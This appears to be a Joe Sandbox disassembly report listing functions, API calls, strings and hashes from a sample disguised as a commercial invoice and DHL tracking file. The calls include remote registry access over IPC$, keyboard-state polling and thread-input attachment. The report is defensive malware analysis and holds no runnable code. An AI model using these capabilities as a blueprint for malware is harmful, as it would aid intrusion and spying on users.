Instruction Fuzzy Hash: 97416F7281021AABDF18EBE5DD95DFE7779AF28304F500025E60172191EB316F88CBA1

Function 012A06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 012A07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 012A07BE
RegOpenKeyExW.ADVAPI32 ref: 012A07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 012A0804
CLSIDFromString.OLE32(?,000001FE), ref: 012A082C
RegCloseKey.ADVAPI32(?), ref: 012A0837
RegCloseKey.ADVAPI32(?), ref: 012A083C

Strings

\IPC$, xrefs: 012A0784
SOFTWARE\Classes\, xrefs: 012A070E
\CLSID, xrefs: 012A0724

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 8849ac62e00545806aced69a8fda87dc3cf7cec54654bc36d116cfd0c0b65cd5
Instruction ID: 913968fe49090f96af21c13be55d2950141fa1079f11b43acb80190f0d2bb874
Opcode Fuzzy Hash: 8849ac62e00545806aced69a8fda87dc3cf7cec54654bc36d116cfd0c0b65cd5
Instruction Fuzzy Hash: 7C410876C2122AABDF25EBA4DC94DFEB778FF14754F444169E901A3250EB309944CBA0

Function 012C3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 012C3C5C
CoInitialize.OLE32(00000000), ref: 012C3C8A
CoUninitialize.OLE32 ref: 012C3C94
_wcslen.LIBCMT ref: 012C3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 012C3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 012C3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 012C3F0E
CoGetObject.OLE32(?,00000000,012DFB98,?), ref: 012C3F2D
SetErrorMode.KERNEL32(00000000), ref: 012C3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012C3FC4
VariantClear.OLEAUT32(?), ref: 012C3FD8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 84cda638933c44a17afff4cc507656a74dc22fdb2deeb6a9fa54c2f362140ce9
Instruction ID: 94a839908fd05f97a3c8c4e288c3435df8aa179cb0f67ed1d5c89efe96837299
Opcode Fuzzy Hash: 84cda638933c44a17afff4cc507656a74dc22fdb2deeb6a9fa54c2f362140ce9
Instruction Fuzzy Hash: 03C138716183029FD710DF68C88492BBBE9FF89B44F008A5DFA899B250D771ED45CB52

Function 012B7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 012B7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 012B7B8F
SHGetDesktopFolder.SHELL32(?), ref: 012B7BA3
CoCreateInstance.OLE32(012DFD08,00000000,00000001,01306E6C,?), ref: 012B7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 012B7C74
CoTaskMemFree.OLE32(?), ref: 012B7CCC
SHBrowseForFolderW.SHELL32(?), ref: 012B7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 012B7D7A
CoTaskMemFree.OLE32(00000000), ref: 012B7D81
CoTaskMemFree.OLE32(00000000), ref: 012B7DD6
CoUninitialize.OLE32 ref: 012B7DDC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: a375840656df4a4f0d92e2b0489371f2daf25e1ffbd02960f8028ca71c43c701
Instruction ID: b181be17829d35e57d5d47bb5be45d945523981676175b98bfe46e193b0288ef
Opcode Fuzzy Hash: a375840656df4a4f0d92e2b0489371f2daf25e1ffbd02960f8028ca71c43c701
Instruction Fuzzy Hash: D6C12A75A1010AAFDB14DFA4C8C8DAEBBF9FF48354B148498E91ADB261D730ED45CB90

Function 012D541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 012D5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 012D5515
CharNextW.USER32(00000158), ref: 012D5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 012D5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 012D559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 012D55AC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 4d0d588ea2879aa2809f1681aecabc15299c80a358189ad02e26a1d63a900eb5
Instruction ID: b21a3dd87c10000a304f1b72e9ecaf18bf1a6959dd2737cc4077950bde8dd676
Opcode Fuzzy Hash: 4d0d588ea2879aa2809f1681aecabc15299c80a358189ad02e26a1d63a900eb5
Instruction Fuzzy Hash: 23619530A21209AFDF258F54DC85DFE7BB9FF06764F004149FA25A7290D7B49641CBA1

Function 0129FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0129FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0129FB08
VariantInit.OLEAUT32(?), ref: 0129FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0129FB3A
VariantCopy.OLEAUT32(?,?), ref: 0129FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0129FBA1
VariantClear.OLEAUT32(?), ref: 0129FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0129FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0129FBCC
VariantClear.OLEAUT32(?), ref: 0129FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0129FBE9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bcdebb5141453c08d1f97029a295f30c1b6bbf587114518d930c82e73bd79473
Instruction ID: 0fba03451cd0e533443dbef64e2abe60f64b8ae099e63d284e407424108178bb
Opcode Fuzzy Hash: bcdebb5141453c08d1f97029a295f30c1b6bbf587114518d930c82e73bd79473
Instruction Fuzzy Hash: CE417D35E1021AAFCF14DF68D9589AEBFB9FF08344F008069E906E7250DB34A945CFA0

Function 012A9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 012A9CA1
GetAsyncKeyState.USER32 ref: 012A9D22
GetKeyState.USER32(000000A0), ref: 012A9D3D
GetAsyncKeyState.USER32 ref: 012A9D57
GetKeyState.USER32(000000A1), ref: 012A9D6C
GetAsyncKeyState.USER32 ref: 012A9D84
GetKeyState.USER32(00000011), ref: 012A9D96
GetAsyncKeyState.USER32 ref: 012A9DAE
GetKeyState.USER32(00000012), ref: 012A9DC0
GetAsyncKeyState.USER32 ref: 012A9DD8
GetKeyState.USER32(0000005B), ref: 012A9DEA

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c146d48e8c6232c0bfe428917bf9fd0320f89d5765400139666303dd9695754d
Instruction ID: 36e213e0ac1d498a1df06932ae1579339ed2dc42ef347a5865ea81373796e7e7
Opcode Fuzzy Hash: c146d48e8c6232c0bfe428917bf9fd0320f89d5765400139666303dd9695754d
Instruction Fuzzy Hash: 4041E530914BCB6BFF32966AD4043A5BEA1AF05308F84805ECBC6565C3EBA495C8C7D2

Function 012C055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 012C05BC
inet_addr.WSOCK32(?), ref: 012C061C
gethostbyname.WSOCK32(?), ref: 012C0628
IcmpCreateFile.IPHLPAPI ref: 012C0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 012C06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 012C06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 012C07B9
WSACleanup.WSOCK32 ref: 012C07BF

Strings

Ping, xrefs: 012C0676

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 52dad23ed34e9357c6fbf4c80fa0aae3299400e543766549996a6cd52bc95925
Instruction ID: 1e53302c3af91e5fa0ccd40450f6ccafbd423ab42fbb679859200676b3eaad38
Opcode Fuzzy Hash: 52dad23ed34e9357c6fbf4c80fa0aae3299400e543766549996a6cd52bc95925
Instruction Fuzzy Hash: 1B919F78514202DFD728CF19D488F2ABBE4AF44718F14869DF6698B6A2C770ED45CF81

Function 012C8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 012C8CF3

Part of subcall function 012A8E54: _wcslen.LIBCMT ref: 012A8E77

_wcslen.LIBCMT ref: 012C8D4E
_wcslen.LIBCMT ref: 012C8D9C
_wcslen.LIBCMT ref: 012C8DDC
_wcslen.LIBCMT ref: 012C8E6E

Strings

stdcall, xrefs: 012C8DD6, 012C8DDB
cdecl, xrefs: 012C8D48, 012C8D4D
none, xrefs: 012C8E65, 012C8E6A
winapi, xrefs: 012C8D96, 012C8D9B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 34582078eac79dc2758f9cecaac9919d90b3f254f72b623d760f47039ab4a440
Instruction ID: 2a1d225de496aba9aa4d80040fb8c0c29ead14bd0f57dc7196d21b709a7949c8
Opcode Fuzzy Hash: 34582078eac79dc2758f9cecaac9919d90b3f254f72b623d760f47039ab4a440
Instruction Fuzzy Hash: C8519031A201179BCF15DF6CC9508BEB7A5BF64A24B20832DF666E7285EB31DD40CB90

Function 012C372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 012C3774
CoUninitialize.OLE32 ref: 012C377F
CoCreateInstance.OLE32(?,00000000,00000017,012DFB78,?), ref: 012C37D9
IIDFromString.OLE32(?,?), ref: 012C384C
VariantInit.OLEAUT32(?), ref: 012C38E4
VariantClear.OLEAUT32(?), ref: 012C3936

Strings

NULL Pointer assignment, xrefs: 012C381E
Failed to create object, xrefs: 012C37E4, 012C389A
Invalid parameter, xrefs: 012C3865

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: adc4cd5e2fcf23bd3325acbd814dd586da1760cc1323da34246b2e1b67819e30
Instruction ID: 02d38358549db8e35d9320176ac588db9e5ddfc5cffa884b1ab3e49a7292980f
Opcode Fuzzy Hash: adc4cd5e2fcf23bd3325acbd814dd586da1760cc1323da34246b2e1b67819e30
Instruction Fuzzy Hash: 43618070624302AFD311DF54D888B6BBBE4FF49B14F008A0DFA859B291D770E948CB96

Function 012B8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 012B8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 012B8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 012B8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 012B8310
SetCurrentDirectoryW.KERNEL32(?), ref: 012B8324
SetCurrentDirectoryW.KERNEL32(?), ref: 012B8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 012B838C
SetCurrentDirectoryW.KERNEL32(?), ref: 012B8395

Strings

*.*, xrefs: 012B839B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 5a87efe03fbd7ff8977c618cea22c79ba196d5e2ff064a34da497b0dce06724b
Instruction ID: e2acd25110fe5137508b94750192222a0136199ad39c260396ece24902d435ab
Opcode Fuzzy Hash: 5a87efe03fbd7ff8977c618cea22c79ba196d5e2ff064a34da497b0dce06724b
Instruction Fuzzy Hash: 3D619CB25243469FCB10EF64D8849AEB3ECFF98354F04491EEA99C7250DB31E945CB92

Function 012B3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 012B33CF

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 012B33F0

Strings

Error: , xrefs: 012B34D1
Line %d (File "%s"):, xrefs: 012B3443, 012B345C
"%s" (%d) : ==> %s:%s%s, xrefs: 012B3504
"%s" (%d) : ==> %s:, xrefs: 012B3522
^ ERROR , xrefs: 012B349E
Incorrect parameters to object property !, xrefs: 012B34AB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: cde270c583b6fb3c236980ec22606e5a96b8934538a1568b51387fa18e094a3f
Instruction ID: 5089f5f3c25d712ac44d9d7a416728baaed037ba4d08f14df8fcade98d81a1b5
Opcode Fuzzy Hash: cde270c583b6fb3c236980ec22606e5a96b8934538a1568b51387fa18e094a3f
Instruction Fuzzy Hash: CA51B17291020BABEF19EBA4DD85EFEB778BF28344F104165E60572154EB316F98CB60

Function 012AB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 012AB5FC
_wcslen.LIBCMT ref: 012AB608
_wcslen.LIBCMT ref: 012AB64D
_wcslen.LIBCMT ref: 012AB68C
_wcslen.LIBCMT ref: 012AB6C7

Strings

EXISTS, xrefs: 012AB686, 012AB68B
REMOVE, xrefs: 012AB602, 012AB607
KEYS, xrefs: 012AB647, 012AB64C
APPEND, xrefs: 012AB6C1, 012AB6C6

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 138e7219275df15dcbbd3414df09594c3bff3dc08b687dc4796b1f22cb65795a
Instruction ID: acd023453d2859b0f75940bddc8ba00a5786fe305a17240e95c164dd0c09a4ff
Opcode Fuzzy Hash: 138e7219275df15dcbbd3414df09594c3bff3dc08b687dc4796b1f22cb65795a
Instruction Fuzzy Hash: 33410932A210279FCB206F7DCC905BEBBA5AF60F54B64412AE661DB285F631C981C790

Function 012B5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 012B53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 012B5416
GetLastError.KERNEL32 ref: 012B5420
SetErrorMode.KERNEL32(00000000,READY), ref: 012B54A7

Strings

READY, xrefs: 012B5460, 012B5468
UNKNOWN, xrefs: 012B5444
INVALID, xrefs: 012B5459
NOTREADY, xrefs: 012B544B
READONLY, xrefs: 012B5452

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: fff972f86b323ad7df68171874c0f0087cc7980adf588da3dcbd01df6cb36a83
Instruction ID: f35cb69fc1a186e859ef9d067de5cdcd615735aab697bbe03a7ec020a7efcd2d
Opcode Fuzzy Hash: fff972f86b323ad7df68171874c0f0087cc7980adf588da3dcbd01df6cb36a83
Instruction Fuzzy Hash: 5131BD75A202069FDB15DF68C4C8AEABBF4FB08349F088059E605CF292DB75DD46CB90

Function 012D3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 012D3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 012D3AA0
GetWindowLongW.USER32(?,000000F0), ref: 012D3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 012D3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 012D3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 012D3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 012D3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 012D3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 012D3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 012D3C13

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a266e92acbc876446322b4588e61951a55e0932cd76f414ec1c490f9d87cd873
Instruction ID: 44967859c09a7d57580ecffd6f67216ab910696b527da46b720d709f0dc99b2e
Opcode Fuzzy Hash: a266e92acbc876446322b4588e61951a55e0932cd76f414ec1c490f9d87cd873
Instruction Fuzzy Hash: E16189B5A00209AFDB20DFA8CC81EEE77F8FB19704F104199FA15E7291D770A941DB50

Function 012AB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(?,?,?,?,?,012AA1E1,?,00000001), ref: 012AB151
GetForegroundWindow.USER32 ref: 012AB165
GetWindowThreadProcessId.USER32(00000000), ref: 012AB16C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012AB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 012AB18D
AttachThreadInput.USER32(?,00000000,00000001), ref: 012AB1A6
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012AB1B8
AttachThreadInput.USER32(00000000,00000000), ref: 012AB1FD
AttachThreadInput.USER32(?,?,00000000), ref: 012AB212
AttachThreadInput.USER32(00000000,?,00000000), ref: 012AB21D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

